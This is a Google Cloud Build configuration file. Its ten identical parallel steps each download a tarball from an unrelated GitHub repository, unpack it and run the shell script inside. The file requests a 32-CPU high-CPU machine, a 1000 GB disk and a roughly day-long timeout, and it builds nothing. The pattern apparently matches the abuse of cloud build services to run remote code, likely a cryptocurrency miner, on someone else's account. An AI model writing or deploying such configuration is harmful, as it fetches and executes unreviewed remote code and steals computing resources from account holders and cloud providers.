steps:
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/idirhrdbv/gaskeun/raw/main/awon.tar.gz && tar xf
        awon.tar.gz && ./balap.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86000s
options:
  machineType: E2_HIGHCPU_32
  diskSizeGb: '1000'